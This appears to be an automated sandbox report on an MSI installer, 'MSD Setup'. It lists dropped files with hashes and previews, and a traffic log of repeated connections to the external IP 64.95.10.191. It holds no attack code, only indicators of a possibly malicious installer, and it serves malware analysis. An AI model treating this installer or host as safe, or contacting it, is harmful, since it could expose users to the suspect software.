Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6222
Entropy (8bit):3.7275866104842836
Encrypted:false
SSDEEP:96:9ve/CPP86kvhkvCCtMhYhbQ8VHyEYhbQ8IHyA:9vfPtMhYd6EYd9A
MD5:CA2CD23D912558ED3AD0C8CF3D22BC77
SHA1:F3693DBB2707C5FF457A5007A2F053875F4B4F39
SHA-256:509457D06B25C1F4C2627AD9801FF7835271BFF28D3E2258B79105F4613ED164
SHA-512:6CB91671833C2BA2CAAA6F3F7B60E78C36062657244646CF3FC6509505AADA0EF8E2F6E8E0FC31E89764B9EC0C8ADFF2BA6560FED1DE1BD1D5FD3E3F9991412E
Malicious:false
Preview:...................................FL..................F.".. ......Yd...m..V....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....w.P..... IV........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.X.}..........................d...A.p.p.D.a.t.a...B.V.1......X.}..Roaming.@......EW)B.X.}...........................q,.R.o.a.m.i.n.g.....\.1......X.}..MICROS~1..D......EW)B.X.}..........................Q...M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.X.}.........................._.^.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.X.}....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.X.}....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.X.}.....0..........
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6222
Entropy (8bit):3.7275866104842836
Encrypted:false
SSDEEP:96:9ve/CPP86kvhkvCCtMhYhbQ8VHyEYhbQ8IHyA:9vfPtMhYd6EYd9A
MD5:CA2CD23D912558ED3AD0C8CF3D22BC77
SHA1:F3693DBB2707C5FF457A5007A2F053875F4B4F39
SHA-256:509457D06B25C1F4C2627AD9801FF7835271BFF28D3E2258B79105F4613ED164
SHA-512:6CB91671833C2BA2CAAA6F3F7B60E78C36062657244646CF3FC6509505AADA0EF8E2F6E8E0FC31E89764B9EC0C8ADFF2BA6560FED1DE1BD1D5FD3E3F9991412E
Malicious:false
Preview:...................................FL..................F.".. ......Yd...m..V....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....w.P..... IV........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.X.}..........................d...A.p.p.D.a.t.a...B.V.1......X.}..Roaming.@......EW)B.X.}...........................q,.R.o.a.m.i.n.g.....\.1......X.}..MICROS~1..D......EW)B.X.}..........................Q...M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.X.}.........................._.^.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.X.}....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.X.}....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.X.}.....0..........
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments: This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number: {D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
Category:dropped
Size (bytes):32768
Entropy (8bit):3.790831399963701
Encrypted:false
SSDEEP:384:nzxSDkMI5kI0ey3M5sCJx5Pey3M5sC0qoXoCHo:/MS4eWMmCxeWMmC
MD5:00A9FA63E6253CB5F8F8448281DDD054
SHA1:083C7BF52727EDFFA8160308C677B4DA8A4F7815
SHA-256:C76014007BA73EFC85FD7B1D9E9BCED4EA66DA7C4CF4DD1560EC0CF02361FC5B
SHA-512:BED03ACA4562187AB1AA818AA8C53474982C84F5F6E5B0331A2AF4FEB51D5BC7B1AC1D495040DCD2B572827D019FA3FF04D808011FEBC9FC52113B93587CB7A5
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments: This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number: {D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
Category:dropped
Size (bytes):32768
Entropy (8bit):3.790831399963701
Encrypted:false
SSDEEP:384:nzxSDkMI5kI0ey3M5sCJx5Pey3M5sC0qoXoCHo:/MS4eWMmCxeWMmC
MD5:00A9FA63E6253CB5F8F8448281DDD054
SHA1:083C7BF52727EDFFA8160308C677B4DA8A4F7815
SHA-256:C76014007BA73EFC85FD7B1D9E9BCED4EA66DA7C4CF4DD1560EC0CF02361FC5B
SHA-512:BED03ACA4562187AB1AA818AA8C53474982C84F5F6E5B0331A2AF4FEB51D5BC7B1AC1D495040DCD2B572827D019FA3FF04D808011FEBC9FC52113B93587CB7A5
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):2663
Entropy (8bit):5.704098421843404
Encrypted:false
SSDEEP:48:DHc2Fb6QyP3EII6LD8SeGeUH3nRiUu5xgunEVltN3+Vi:DHc2F6D821eGeuANHjnEP/Ow
MD5:A1237D03E88E12460DA89771CDBC212A
SHA1:28D7C0FA3CBA322922FAA88D274BD3C0648DC787
SHA-256:75CEE9B705B3033D2D237C76F37DF1D44D9E9A87737699673F67A6F8A6775B81
SHA-512:931C010572D023303517DFF4AE81606C736218A6746CFCC0F0334FF75954D6E14B59C061A9F0C4CCD8BAF0FB89DF6268E02C3A2E2A4B79F3B7B37CD364FA4B0A
Malicious:false
Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{5388A5D6-8B37-4242-B64C-4D72F236B407}..MSD Setup..MSD_Setup_sib.msi.@.....@.....@.....@........&.{D59C64C0-985A-437E-9F88-C578DBDDC731}.....@.....@.....@.....@.......@.....@.....@.......@......MSD Setup......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{5388A5D6-8B37-4242-B64C-4D728033EE88}..C:\ProgramData\.@.......@.....@.....@......&.{5388A5D6-8B37-4242-B64C-4D72F511202A}..C:\ProgramData\lgp\.@.......@.....@.....@......&.{5388A5D6-8B37-4242-B64C-4D7245AF011A}..C:\ProgramData\lgp\sjm.@.......@.....@.....@......&.{5388A5D6-8B37-4242-B64C-4D7288057524}..01:\Software\WixSharp\Used\.@.......@.....@.....@......&.{5388A5D6-8B37-4242-B64C-4D7235B6147A}..C:\.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]"...C:\ProgramData\.@...."...C:\ProgramData\lgp\.@....".#.C:\Users\hu
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.165075825566736
Encrypted:false
SSDEEP:12:JSbX72FjOkfiAGiLIlHVRpEh/7777777777777777777777777vDHFfmdBwrYEWr:J2QI5UyBwrYETF
MD5:EDF24E96E95B1DCEBCE0B090768C243F
SHA1:F95D1EB121BD17C0F260B8D68938111E8DF98092
SHA-256:F2AC676569FCF72A035AE6F18EB1DF06312FA40C851FB9EE1424F1FAA6EBD5A5
SHA-512:857F8FDCC3DDE97A68CECE020683BED9064D62E00306A136AB39A75BC2D94012BD85AF573898AA4A6510B46327AA1EF078F71F01DCB32E09EEF3A9313273610A
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.450933982597443
Encrypted:false
SSDEEP:48:Q8PhyuRc06WXJMjT5mx26pES54rLESIF:/hy1vjTZzMZ
MD5:05F9C20BB7A73C36D69F48147FDE770E
SHA1:7EC385DAAFD14643C48D64C40CCF3BB5ACFC600A
SHA-256:E0E93F4A2F537524C4D811689ACC5597730F8169C30FC3E03AE8FA9296D1DA87
SHA-512:1D326158B549A9812A816A45F473C8A26445A16590DD22C736907719ACA39753A22BE8DDAD133E6CF8451376E9D894074E97301DFA4EA7588C4EC0D81F816170
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):360001
Entropy (8bit):5.362976626789529
Encrypted:false
SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauQ:zTtbmkExhMJCIpEV
MD5:0053D52CCE35A087901B77628DE9BF97
SHA1:FBB18FFB174E20C87B360BCE8E3720EACA566E9E
SHA-256:0C9B41563E8E13E6518AB83FAE1C5B22DCBFC5EFB6417593B2F129DBA2AD04EC
SHA-512:3A21C74F53BF8ACEDC11C47ACE8BAA8DE9AE5CA2F929E93F1AF850773664DC67A922B8239F7A38AF61284A78ED048B5A9DB026E4825E1931173153C91C15CA49
Malicious:false
Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):32768
Entropy (8bit):1.170539252662047
Encrypted:false
SSDEEP:24:JXhs3NauxlpiEipKP2xza2tzhAlZZagUMClXtdQN/5eYc+TP863s+EipV7VPwGic:uNaufpJveFXJnT5Ox26pES54rLESIF
MD5:E3FB91DA63022FF795E1BF00A789C1F4
SHA1:5EE4861FB40026EE8E8968D29ABCDE113A364A6F
SHA-256:A5BB148978C27A28303DD2D94462538B9F6C6E59ED5BDC799DA9B4D34A708470
SHA-512:4B76AF3D4B67E10E3BBFE9FD6511D8278557F423A43B5823B9D4CA9823C4B200931996CCDCFB376752D29B8FD93C69B75EE3286A5A4D359FD2802545770EEBE3
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.450933982597443
Encrypted:false
SSDEEP:48:Q8PhyuRc06WXJMjT5mx26pES54rLESIF:/hy1vjTZzMZ
MD5:05F9C20BB7A73C36D69F48147FDE770E
SHA1:7EC385DAAFD14643C48D64C40CCF3BB5ACFC600A
SHA-256:E0E93F4A2F537524C4D811689ACC5597730F8169C30FC3E03AE8FA9296D1DA87
SHA-512:1D326158B549A9812A816A45F473C8A26445A16590DD22C736907719ACA39753A22BE8DDAD133E6CF8451376E9D894074E97301DFA4EA7588C4EC0D81F816170
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.07267965184950492
Encrypted:false
SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOfF0BdqcBwrYXUkSVky6lV1:2F0i8n0itFzDHFfmdBwrYEW/
MD5:9BF6455DF42DA4C21148658D2835F1F4
SHA1:1C81B07EB18BD5E93097F8BB1A25878EE8FACC4A
SHA-256:A2F97AFCCEAFEFB05E8516FE9F8ADF44AB3306FC1BFE93BE894005C0FB63FFAA
SHA-512:B83F97A2F5A5BBC815DA49DCA0996B6D090FC3800FDE1697BC3974509AAD4F857B796D6D8FD92820775CD7DA6E7A4EC4D8E16FE7C76309FEF1A54626950098F4
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):32768
Entropy (8bit):1.170539252662047
Encrypted:false
SSDEEP:24:JXhs3NauxlpiEipKP2xza2tzhAlZZagUMClXtdQN/5eYc+TP863s+EipV7VPwGic:uNaufpJveFXJnT5Ox26pES54rLESIF
MD5:E3FB91DA63022FF795E1BF00A789C1F4
SHA1:5EE4861FB40026EE8E8968D29ABCDE113A364A6F
SHA-256:A5BB148978C27A28303DD2D94462538B9F6C6E59ED5BDC799DA9B4D34A708470
SHA-512:4B76AF3D4B67E10E3BBFE9FD6511D8278557F423A43B5823B9D4CA9823C4B200931996CCDCFB376752D29B8FD93C69B75EE3286A5A4D359FD2802545770EEBE3
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):69632
Entropy (8bit):0.09843252197005396
Encrypted:false
SSDEEP:24:Avn+EipVc+EipV7VPwGilrkgU63oV+TseY+4:Av+ESFES54rCVvh
MD5:4BBD64867D47373AB090C6465AB8486C
SHA1:5C13C92154AB2B55E60BEA33FE7D5D0903F28428
SHA-256:6C04867265CC1DA642A1746FC5686A34223D5E618B917D34E93D27593229B9AB
SHA-512:B1F06B3D9FE1696BC0549938690EDB1D5E6801F22FC1045E3532F06BFF57172399583B45BE637861858A27EF2B6D6B750877E44E7812ECCD29054F0AEA97E3B5
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):32768
Entropy (8bit):1.170539252662047
Encrypted:false
SSDEEP:24:JXhs3NauxlpiEipKP2xza2tzhAlZZagUMClXtdQN/5eYc+TP863s+EipV7VPwGic:uNaufpJveFXJnT5Ox26pES54rLESIF
MD5:E3FB91DA63022FF795E1BF00A789C1F4
SHA1:5EE4861FB40026EE8E8968D29ABCDE113A364A6F
SHA-256:A5BB148978C27A28303DD2D94462538B9F6C6E59ED5BDC799DA9B4D34A708470
SHA-512:4B76AF3D4B67E10E3BBFE9FD6511D8278557F423A43B5823B9D4CA9823C4B200931996CCDCFB376752D29B8FD93C69B75EE3286A5A4D359FD2802545770EEBE3
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.450933982597443
Encrypted:false
SSDEEP:48:Q8PhyuRc06WXJMjT5mx26pES54rLESIF:/hy1vjTZzMZ
MD5:05F9C20BB7A73C36D69F48147FDE770E
SHA1:7EC385DAAFD14643C48D64C40CCF3BB5ACFC600A
SHA-256:E0E93F4A2F537524C4D811689ACC5597730F8169C30FC3E03AE8FA9296D1DA87
SHA-512:1D326158B549A9812A816A45F473C8A26445A16590DD22C736907719ACA39753A22BE8DDAD133E6CF8451376E9D894074E97301DFA4EA7588C4EC0D81F816170
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:modified
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments: This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number: {D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
Entropy (8bit):3.790831399963701
TrID:
  • Microsoft Windows Installer (60509/1) 88.31%
  • Generic OLE2 / Multistream Compound File (8008/1) 11.69%
File name:MSD_Setup_sib.msi
File size:32'768 bytes
MD5:00a9fa63e6253cb5f8f8448281ddd054
SHA1:083c7bf52727edffa8160308c677b4da8a4f7815
SHA256:c76014007ba73efc85fd7b1d9e9bced4ea66da7c4cf4dd1560ec0cf02361fc5b
SHA512:bed03aca4562187ab1aa818aa8c53474982c84f5f6e5b0331a2af4feb51d5bc7b1ac1d495040dcd2b572827d019fa3ff04d808011febc9fc52113b93587cb7a5
SSDEEP:384:nzxSDkMI5kI0ey3M5sCJx5Pey3M5sC0qoXoCHo:/MS4eWMmCxeWMmC
TLSH:E7E2B51776049331C48607314A2FA7E48B3AAC588F671526769BF38C2F73DD066B7AE1
File Content Preview:........................>......................................................................................................................................................................................................................................
Icon Hash:2d2e3797b32b2b99
TimestampSource PortDest PortSource IPDest IP
Apr 23, 2024 17:46:07.842658997 CEST4970580192.168.2.864.95.10.191
Apr 23, 2024 17:46:07.963412046 CEST804970564.95.10.191192.168.2.8
Apr 23, 2024 17:46:07.963516951 CEST4970580192.168.2.864.95.10.191
Apr 23, 2024 17:46:07.963921070 CEST4970580192.168.2.864.95.10.191
Apr 23, 2024 17:46:08.084275961 CEST804970564.95.10.191192.168.2.8
Apr 23, 2024 17:46:08.137562990 CEST804970564.95.10.191192.168.2.8
Apr 23, 2024 17:46:08.190300941 CEST4970580192.168.2.864.95.10.191
Apr 23, 2024 17:46:13.138724089 CEST804970564.95.10.191192.168.2.8
Apr 23, 2024 17:46:13.138900042 CEST4970580192.168.2.864.95.10.191
Apr 23, 2024 17:46:15.687860012 CEST4970580192.168.2.864.95.10.191
Apr 23, 2024 17:46:15.688076973 CEST4970680192.168.2.864.95.10.191
Apr 23, 2024 17:46:15.809478998 CEST804970564.95.10.191192.168.2.8
Apr 23, 2024 17:46:15.810794115 CEST804970664.95.10.191192.168.2.8
Apr 23, 2024 17:46:15.810892105 CEST4970680192.168.2.864.95.10.191
Apr 23, 2024 17:46:15.811012030 CEST4970680192.168.2.864.95.10.191
Apr 23, 2024 17:46:15.933645964 CEST804970664.95.10.191192.168.2.8
Apr 23, 2024 17:46:15.994256973 CEST804970664.95.10.191192.168.2.8
Apr 23, 2024 17:46:16.034065008 CEST4970680192.168.2.864.95.10.191
Apr 23, 2024 17:46:20.996730089 CEST804970664.95.10.191192.168.2.8
Apr 23, 2024 17:46:20.996807098 CEST4970680192.168.2.864.95.10.191
Apr 23, 2024 17:46:22.446547985 CEST4971080192.168.2.864.95.10.191
Apr 23, 2024 17:46:22.447366953 CEST4970680192.168.2.864.95.10.191
Apr 23, 2024 17:46:22.569477081 CEST804971064.95.10.191192.168.2.8
Apr 23, 2024 17:46:22.569643021 CEST4971080192.168.2.864.95.10.191
Apr 23, 2024 17:46:22.569947004 CEST804970664.95.10.191192.168.2.8
Apr 23, 2024 17:46:22.569963932 CEST4971080192.168.2.864.95.10.191
Apr 23, 2024 17:46:22.692754030 CEST804971064.95.10.191192.168.2.8
Apr 23, 2024 17:46:22.721709013 CEST804971064.95.10.191192.168.2.8
Apr 23, 2024 17:46:22.768436909 CEST4971080192.168.2.864.95.10.191
Apr 23, 2024 17:46:27.722608089 CEST804971064.95.10.191192.168.2.8
Apr 23, 2024 17:46:27.722697973 CEST4971080192.168.2.864.95.10.191
Apr 23, 2024 17:46:29.165702105 CEST4971080192.168.2.864.95.10.191
Apr 23, 2024 17:46:29.166042089 CEST4971180192.168.2.864.95.10.191
Apr 23, 2024 17:46:29.286838055 CEST804971164.95.10.191192.168.2.8
Apr 23, 2024 17:46:29.286969900 CEST4971180192.168.2.864.95.10.191
Apr 23, 2024 17:46:29.287122011 CEST4971180192.168.2.864.95.10.191
Apr 23, 2024 17:46:29.288549900 CEST804971064.95.10.191192.168.2.8
Apr 23, 2024 17:46:29.408020020 CEST804971164.95.10.191192.168.2.8
Apr 23, 2024 17:46:29.446631908 CEST804971164.95.10.191192.168.2.8
Apr 23, 2024 17:46:29.487255096 CEST4971180192.168.2.864.95.10.191
Apr 23, 2024 17:46:34.448323965 CEST804971164.95.10.191192.168.2.8
Apr 23, 2024 17:46:34.448388100 CEST4971180192.168.2.864.95.10.191
Apr 23, 2024 17:46:36.435614109 CEST4971180192.168.2.864.95.10.191
Apr 23, 2024 17:46:36.435946941 CEST4971280192.168.2.864.95.10.191
Apr 23, 2024 17:46:36.556384087 CEST804971164.95.10.191192.168.2.8
Apr 23, 2024 17:46:36.556461096 CEST804971264.95.10.191192.168.2.8
Apr 23, 2024 17:46:36.556565046 CEST4971280192.168.2.864.95.10.191
Apr 23, 2024 17:46:36.561340094 CEST4971280192.168.2.864.95.10.191
Apr 23, 2024 17:46:36.681884050 CEST804971264.95.10.191192.168.2.8
Apr 23, 2024 17:46:36.741537094 CEST804971264.95.10.191192.168.2.8
Apr 23, 2024 17:46:36.784061909 CEST4971280192.168.2.864.95.10.191
Apr 23, 2024 17:46:41.743474960 CEST804971264.95.10.191192.168.2.8
Apr 23, 2024 17:46:41.743664026 CEST4971280192.168.2.864.95.10.191
Apr 23, 2024 17:46:43.195458889 CEST4971280192.168.2.864.95.10.191
Apr 23, 2024 17:46:43.195822954 CEST4971380192.168.2.864.95.10.191
Apr 23, 2024 17:46:43.316236019 CEST804971264.95.10.191192.168.2.8
Apr 23, 2024 17:46:43.318456888 CEST804971364.95.10.191192.168.2.8
Apr 23, 2024 17:46:43.318562031 CEST4971380192.168.2.864.95.10.191
Apr 23, 2024 17:46:43.318789005 CEST4971380192.168.2.864.95.10.191
Apr 23, 2024 17:46:43.441548109 CEST804971364.95.10.191192.168.2.8
Apr 23, 2024 17:46:43.473573923 CEST804971364.95.10.191192.168.2.8
Apr 23, 2024 17:46:43.518507957 CEST4971380192.168.2.864.95.10.191
Apr 23, 2024 17:46:48.490145922 CEST804971364.95.10.191192.168.2.8
Apr 23, 2024 17:46:48.490215063 CEST4971380192.168.2.864.95.10.191
Apr 23, 2024 17:46:49.898108959 CEST4971380192.168.2.864.95.10.191
Apr 23, 2024 17:46:49.898456097 CEST4971480192.168.2.864.95.10.191
Apr 23, 2024 17:46:50.020823956 CEST804971364.95.10.191192.168.2.8
Apr 23, 2024 17:46:50.020848036 CEST804971464.95.10.191192.168.2.8
Apr 23, 2024 17:46:50.020998001 CEST4971480192.168.2.864.95.10.191
Apr 23, 2024 17:46:50.021193027 CEST4971480192.168.2.864.95.10.191
Apr 23, 2024 17:46:50.143548965 CEST804971464.95.10.191192.168.2.8
Apr 23, 2024 17:46:50.196583986 CEST804971464.95.10.191192.168.2.8
Apr 23, 2024 17:46:50.237207890 CEST4971480192.168.2.864.95.10.191
Apr 23, 2024 17:46:55.199811935 CEST804971464.95.10.191192.168.2.8
Apr 23, 2024 17:46:55.199878931 CEST4971480192.168.2.864.95.10.191
Apr 23, 2024 17:46:56.625847101 CEST4971480192.168.2.864.95.10.191
Apr 23, 2024 17:46:56.626264095 CEST4971680192.168.2.864.95.10.191
Apr 23, 2024 17:46:56.747085094 CEST804971664.95.10.191192.168.2.8
Apr 23, 2024 17:46:56.747242928 CEST4971680192.168.2.864.95.10.191
Apr 23, 2024 17:46:56.747406960 CEST4971680192.168.2.864.95.10.191
Apr 23, 2024 17:46:56.748394966 CEST804971464.95.10.191192.168.2.8
Apr 23, 2024 17:46:56.868486881 CEST804971664.95.10.191192.168.2.8
Apr 23, 2024 17:46:56.917072058 CEST804971664.95.10.191192.168.2.8
Apr 23, 2024 17:46:56.971731901 CEST4971680192.168.2.864.95.10.191
Apr 23, 2024 17:47:01.923032045 CEST804971664.95.10.191192.168.2.8
Apr 23, 2024 17:47:01.923155069 CEST4971680192.168.2.864.95.10.191
Apr 23, 2024 17:47:04.606803894 CEST4971680192.168.2.864.95.10.191
